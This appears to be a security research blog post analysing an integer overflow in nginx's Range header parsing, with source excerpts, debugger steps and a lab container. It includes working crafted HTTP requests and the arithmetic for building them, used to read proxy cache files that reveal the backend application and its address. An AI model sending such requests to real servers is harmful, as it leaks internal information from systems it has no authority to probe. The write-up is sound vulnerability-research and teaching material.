Numbers game: Exploring an integer overflow vulnerability in the popular nginx web server.

Published in Wallarm · Feb 20, 2018

By @aLLy , Wallarm Research

There was a very interesting vulnerability discovered in nginx, one of the most popular web/proxy/load balancing servers. This vulnerability leaks information about the application behind the nginx proxy. For example, a specially formed request can retrieve information on the internal structure of an application and/or its IP address.

Turns out this issue has been around for all of ten years: the vulnerability affects nginx versions from 0.5.6 up to and including 1.13.2, i.e. from 2007 to 2017. As we know, nginx is in use in one of every four web applications, so it would be a good idea to understand this loophole better.

WARNING

Do not try this at home! The material is provided for educational purposes only. Authors and Wallarm disclaim responsibility for any and all possible consequences for trying to reproduce this sequence.

Test environment

To conduct this experiment, we will, of course, need a test environment. Rather than spending time assembling our own distribution, let’s grab a ready-made one and proceed to the fun part. Our esteemed Chinese colleagues have assembled a ready-made docker container with an nginx build featuring the vulnerability in question. The container is available from the vulapps repository. Since most of the pages are, well, in Chinese, here is the specific command to launch the container:

docker run --rm --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d

Incidentally, there are quite a few other interesting test environments in this repo. You can check them out when you have time.

After the command successfully executes, we’ll have nginx server version 1.13.1 running and accessible on port 80.

Just in case you want to get your hands dirty, you can also access the container directly and run:

apt-get update && apt-get install nano build-essential gdb nginx-dbg=1.13.1
service nginx stop && service nginx-debug start
ps aux | grep nginx

Now you can attach to the worker process with the help of gdb:
gdb --pid <pid>

Don’t expect the vulnerability to have a super strong impact. Still, it’s interesting to play with.

About Range

The root cause of the vulnerability is the incorrect processing of byte ranges in the Range header. You may already be aware of what it does, but let’s include a brief overview anyway.

Basic information about Range header

The Range header is used when you need to get back a part of the server response rather than the complete response. The acceptable header format is described in detail in the HTTP/1.1 standard, RFC 2616.

According to this standard, the parameters can include selection ranges. These consist of two parts: the unit in which the range is measured (bytes) and a list of selection rules.
Range: bytes=[-]<begin>-[<end>][,]

The range can be specified in one of two ways. First, you can give the beginning and the end of the range. The standard requires that the beginning position never be less than zero and that the end position be greater than or equal to the beginning; if these conditions are not met, the header is ignored. If the end of the range points at or beyond the last byte of the document, the end position is set to the position of the last byte, i.e. the document length minus one. Likewise, if the end position is omitted, the range ends at the last byte.

For example, if the document size is 138 bytes, then a range specified as bytes=1-137 results in a response of 137 bytes, starting with the second byte and ending with the last one.

In addition, the response contains the Content-Range header, where the full size of the requested document is given after the slash.

The second method selects N bytes of the document from the end. If the document is smaller than the number specified in the request, the entire document is sent. For example, bytes=-7 requests the last 7 bytes.

Also, the spec allows a single Range header to specify multiple ranges, using a comma as a separator.

Using several ranges in Range header
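The resolution rules above can be sketched as a small function. This is a simplified illustration of the RFC 2616 semantics, not nginx's actual parser; the name resolve_range and its signature are invented for this example.

```c
#include <stdint.h>

/* Resolve one byte-range spec against a document of `len` bytes.
 * For "bytes=<begin>-<end>" pass suffix = 0 (end < 0 means "no end given");
 * for "bytes=-<n>" pass suffix = 1 with the count in `begin`.
 * Returns 0 on success, -1 if the range is malformed and must be ignored. */
static int resolve_range(int64_t len, int64_t begin, int64_t end, int suffix,
                         int64_t *out_start, int64_t *out_end)
{
    if (suffix) {
        if (begin > len) {
            begin = len;          /* asked for more than exists: send it all */
        }
        *out_start = len - begin; /* last `begin` bytes */
        *out_end = len - 1;
        return 0;
    }

    if (begin < 0 || (end >= 0 && end < begin)) {
        return -1;                /* start below zero, or end before start */
    }

    if (end < 0 || end >= len) {
        end = len - 1;            /* open-ended or past EOF: clamp to last byte */
    }

    *out_start = begin;
    *out_end = end;
    return 0;
}
```

For a 138-byte document, bytes=1-137 resolves to positions 1 through 137, and bytes=-7 resolves to positions 131 through 137.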

Interestingly, if the server response includes an Accept-Ranges header, the server claims to support partial delivery of data when the request includes a Range header. That said, there is no guarantee, so always test to be sure!

More Details

In nginx, the Range header is processed by ngx_http_range_filter_module, which in turn calls the function ngx_http_range_header_filter.

/src/http/modules/ngx_http_range_filter_module.c

146: static ngx_int_t
147: ngx_http_range_header_filter(ngx_http_request_t *r)
148: {

If the request specifies only one range, the response is the responsibility of ngx_http_range_singlepart_header; if there are several ranges, of ngx_http_range_multipart_header.

/src/http/modules/ngx_http_range_filter_module.c

404: static ngx_int_t
405: ngx_http_range_singlepart_header(ngx_http_request_t *r,
406: ngx_http_range_filter_ctx_t *ctx)
...
455: static ngx_int_t
456: ngx_http_range_multipart_header(ngx_http_request_t *r,
457: ngx_http_range_filter_ctx_t *ctx)
458: {

The actual bug is in the ngx_http_range_parse function, which parses the ranges received in the header.

/src/http/modules/ngx_http_range_filter_module.c

268: static ngx_int_t
269: ngx_http_range_parse(ngx_http_request_t *r, ngx_http_range_filter_ctx_t *ctx,
270:     ngx_uint_t ranges)

To get a better idea of what’s actually going on, let’s attach to the process using gdb and put a breakpoint on line 360:

gdb --pid <pid>
(gdb) break ngx_http_range_filter_module.c:360

Now let’s send a packet with the range specified as negative.

GET / HTTP/1.1
Host: nginx.visualhack
Range: bytes=-10, -20

First, the system detects the type of the transmitted range. If we’ve requested the last N bytes of the document, the suffix variable is set to 1.

/src/http/modules/ngx_http_range_filter_module.c

304: suffix = 0;
...
308: if (*p != '-') {
...
334: } else {
335:     suffix = 1;

Next, the system parses the transmitted string one character at a time. While the characters are '0' through '9' (i.e. digits), the following code executes:

/src/http/modules/ngx_http_range_filter_module.c

343: while (*p >= '0' && *p <= '9') {
344:     if (end >= cutoff && (end > cutoff || *p - '0' > cutlim)) {
345:         return NGX_HTTP_RANGE_NOT_SATISFIABLE;
346:     }
347:
348:     end = end * 10 + *p++ - '0';
349: }
349:

After this loop completes, the variable end holds the numeric value of the transmitted string, without the dash. Let’s skip a few lines that are not that interesting and get to the condition where we want to put a breakpoint.
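The cutoff/cutlim pair in the loop above guards the accumulation against overflowing off_t while the digits are being read. In isolation, the idea looks like this (a sketch: MAX_OFF_T stands in for nginx's actual maximum off_t constant, and parse_off is an invented name):

```c
#include <stdint.h>

#define MAX_OFF_T 0x7fffffffffffffffLL  /* maximum value of a 64-bit off_t */

/* Accumulate a decimal string into an off_t-sized value, refusing numbers
 * that would not fit; returning -1 mirrors the
 * NGX_HTTP_RANGE_NOT_SATISFIABLE exit in ngx_http_range_parse. */
static int64_t parse_off(const char *p)
{
    int64_t cutoff = MAX_OFF_T / 10;   /* 922337203685477580 */
    int64_t cutlim = MAX_OFF_T % 10;   /* 7 */
    int64_t v = 0;

    while (*p >= '0' && *p <= '9') {
        /* would v * 10 + digit exceed MAX_OFF_T? */
        if (v >= cutoff && (v > cutoff || *p - '0' > cutlim)) {
            return -1;
        }
        v = v * 10 + *p++ - '0';
    }

    return v;
}
```

Note that a value like 9223372036854768808 passes this guard, because it does fit in off_t; the overflow exploited later in this article happens afterwards, in the size arithmetic.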

/src/http/modules/ngx_http_range_filter_module.c

357: if (suffix) {
358:     start = content_length - end;
359:     end = content_length - 1;
360: }

Debugging requests with header Range

Now we can look at end, start and content_length variables.

At this point of execution, the start of the selection (start) equals content_length minus the value received as the end-of-selection offset (end), taken without the minus sign. So, if we send a value clearly higher than the overall length of the response, we get back a negative value for the start of the selection.

Incorrect value for the ‘start’ position of the selection

The ‘end’ position of the selection becomes equal to the length of the response minus one. Next, the system checks the overall length of the returned data and, if it is higher than the overall length of the response, the header is ignored. This is all as specified:

/src/http/modules/ngx_http_range_filter_module.c

396: if (size > content_length) {
397: return NGX_DECLINED;
398: }

If the value of the start parameter is less than the value of the end parameter, the size calculation begins. It starts at zero; the system then walks all the transmitted ranges sequentially (if there are several) and adds to the current value the difference between the end and start of each selection (line 380).

To pass the check, we need to assemble a packet where the computed size ends up no larger than the overall length of the document.

Note the type of the start, end and size parameters.

/src/http/modules/ngx_http_range_filter_module.c

295: size = 0;
...
369: found:
370:
371:     if (start < end) {
372:         range = ngx_array_push(&ctx->ranges);
...
377:         range->start = start;
378:         range->end = end;
379:
380:         size += end - start;

According to the GNU C Library manual, off_t is a signed integer type, with an allowed range defined by the specific system and compiler flags.

If the source files are compiled with _FILE_OFFSET_BITS defined as 64, the size of this integer is 64 bits. This is exactly the case with nginx.

Thus, the maximum allowed value for these variables is 0x7fffffffffffffff, since the highest bit is used for the sign.

Maximum allowed module value for a variable of the off_t type
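This limit, and what happens one step past it, is easy to check directly. Signed overflow is undefined behavior in C, so the sketch below routes the increment through uint64_t to model the two's-complement wraparound that happens to off_t values in practice:

```c
#include <stdint.h>

/* Increment with defined two's-complement wraparound: the addition is
 * performed in uint64_t, then reinterpreted as a signed value. */
static int64_t wrap_increment(int64_t v)
{
    return (int64_t)((uint64_t)v + 1);
}
```

wrap_increment(INT64_MAX) yields INT64_MIN: one step past 0x7fffffffffffffff lands on -0x8000000000000000, which is exactly the behavior the exploit relies on.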

Knowing this, we can circumvent the size > content_length check.

Because the overall size is calculated from all the transmitted ranges, we can specify in the first range the negative position where reading will start. In the second range, we transmit a large negative value which, when processed, exceeds the allowed range of the off_t type and wraps around into a negative value, which is certainly less than the entire document size. Let’s clarify with an example.

Suppose we want to start reading at byte -7000. The overall document size is 942 bytes.

With a regular request specified in Range as bytes=-7000 we get back the following:

The last condition is true: the size of the returned data cannot exceed the overall size of the document. Hence, the header is ignored and the server returns the full document.

To get around this, we need to add a second range, chosen in such a way that, when its contribution is added to the previous value, it exceeds the capacity of the size variable. 0x8000000000000000 is the lowest negative number representable in the off_t type. To make the sum land exactly there, we reverse the calculation and add to it the offset where we want to start reading. For our example:

0x8000000000000000 + (-7000) = 9223372036854768808

Below is the request:

GET / HTTP/1.1
Host: nginx.visualhack
Range: bytes=-7000,-9223372036854768808

We’ve already considered the first range. Now, let’s take a look at what happens when the second range is parsed.

Sending the second range which causes overflow

As a result of our manipulations, the second range magically turns into a pumpkin: it adds just the right value for the server to return the selection from the first range, which runs from position -6058 (our requested offset of -7000 plus the 942-byte document length) to byte 941.

Proof of concept

start = content_length - end;  # start = 942 - 9223372036854768808 = -9223372036854767866
end = content_length - 1;      # end = 942 - 1 = 941
...
if (end >= content_length) {
    end = content_length;
} else {
    end++;
}                              # end = 942
...
if (start < end) {             # -9223372036854767866 < 942 == True
...
size += end - start;           # size = 7000 (from the first range) + (942 - (-9223372036854767866)) = -9223372036854775808 (overflow)
...
if (size > content_length) {   # -9223372036854775808 > 942 == False
    return NGX_DECLINED;
}
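The proof of concept above can be replayed as a self-contained calculation. The sketch below mirrors the relevant steps for our 942-byte document and the two suffix ranges -7000 and -9223372036854768808; since signed overflow is undefined behavior in C, the additions are routed through uint64_t to model the two's-complement wraparound of off_t:

```c
#include <stdint.h>

/* Addition and subtraction with defined two's-complement wraparound,
 * modelling what happens to nginx's signed off_t values. */
static int64_t wadd(int64_t a, int64_t b)
{
    return (int64_t)((uint64_t)a + (uint64_t)b);
}

static int64_t wsub(int64_t a, int64_t b)
{
    return (int64_t)((uint64_t)a - (uint64_t)b);
}

/* Replay "Range: bytes=-7000,-9223372036854768808" against a
 * 942-byte document, following the steps of the proof of concept. */
static int64_t simulate_size(void)
{
    int64_t content_length = 942;
    int64_t suffix_values[2] = { 7000, 9223372036854768808LL };
    int64_t size = 0;

    for (int i = 0; i < 2; i++) {
        int64_t end = suffix_values[i];
        int64_t start = wsub(content_length, end); /* goes far negative */

        end = content_length - 1;
        if (end >= content_length) {
            end = content_length;
        } else {
            end++;                                 /* end = 942 */
        }

        if (start < end) {
            size = wadd(size, wsub(end, start));   /* second pass overflows */
        }
    }

    return size;
}
```

simulate_size() returns INT64_MIN, i.e. -9223372036854775808, which is not greater than 942, so the size > content_length check is defeated and both ranges are kept.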

You probably know that nginx is commonly used as a caching reverse proxy. This is how our test environment is configured as well.

/etc/nginx/conf.d/default.conf

12: location ^~ /proxy/ {
13: proxy_pass http://127.0.0.1:8080/;
14: proxy_set_header HOST $host;
15: proxy_cache my_zone;
16: add_header X-Proxy-Cache $upstream_cache_status;
17: proxy_ignore_headers Set-Cookie;
18: }

All requests are sent to /proxy/ and are directed to the local Apache server and cached.

/etc/nginx/nginx.conf

27: proxy_cache_key "$scheme$request_method$host$request_uri";
28: proxy_cache_path /tmp/nginx levels=1:2 keys_zone=my_zone:10m;
29: proxy_cache_valid 200 10m;

Cache files are stored in the /tmp/nginx/ directory. To form paths and filenames, nginx uses the parameters specified in the proxy_cache_key directive. Let’s send a request for /proxy/demo.png and check the generated cache file.

Cache file, created after the requests

You can see that the file contains a special header plus the original response from Apache. This is exactly the data we will be able to retrieve by exploiting the overflow bug.

To make this happen, we need to pick a value which is known to be larger than the document returned by the server (the document length can be found in the Content-Length header), but smaller than the size of the cache file.

In our example, the range should be higher than 16,585 but lower than 17,217.

Now, following the same process as before, we can calculate the second range:

0x8000000000000000 - 17217 = 9223372036854758591
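Both second-range values in this article follow the same formula: 2^63 minus the absolute value of the chosen offset. A tiny helper (the name second_range is invented for illustration) computes it in uint64_t, since 2^63 itself does not fit in a signed 64-bit integer:

```c
#include <stdint.h>

/* Value to send as the second suffix range so that the size sum wraps
 * to exactly -2^63 when the first range is "bytes=-<offset>". */
static uint64_t second_range(uint64_t offset)
{
    return (1ULL << 63) - offset;   /* 0x8000000000000000 - offset */
}
```

second_range(7000) gives 9223372036854768808 and second_range(17217) gives 9223372036854758591, matching the two requests in this article.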

Now let’s use the ranges we’ve calculated to form a request:

GET /proxy/demo.png HTTP/1.1
Host: nginx.visualhack
Range: bytes=-17217,-9223372036854758591

Now we can use the vulnerability to read the cache.

Ta-da! We have just retrieved the entire cache content including the header and the original request to the proxy server. With this, we can easily find out which application is behind the proxy and, possibly, even its IP.

Of course, there are some ready-made exploits for this vulnerability that already implement this logic.

For example, there is a version from nixawk.

Another useful exercise is to look at the code of the patch which addresses this vulnerability and see what’s inside. Who knows, you might still be able to find a bypass!

Conclusions

While the results here are not earth-shattering, it is always useful to understand the internal workings of something as popular as nginx.

It is rare in production deployments to gain superadmin remote execution privileges by exploiting a single vulnerability with a single request. More often than not, it is a combination of vulnerabilities that allows attackers to gradually collect enough information to take over the system. This vulnerability could well be one of the links in such a chain of exploits, which, taken together, can be quite dangerous.
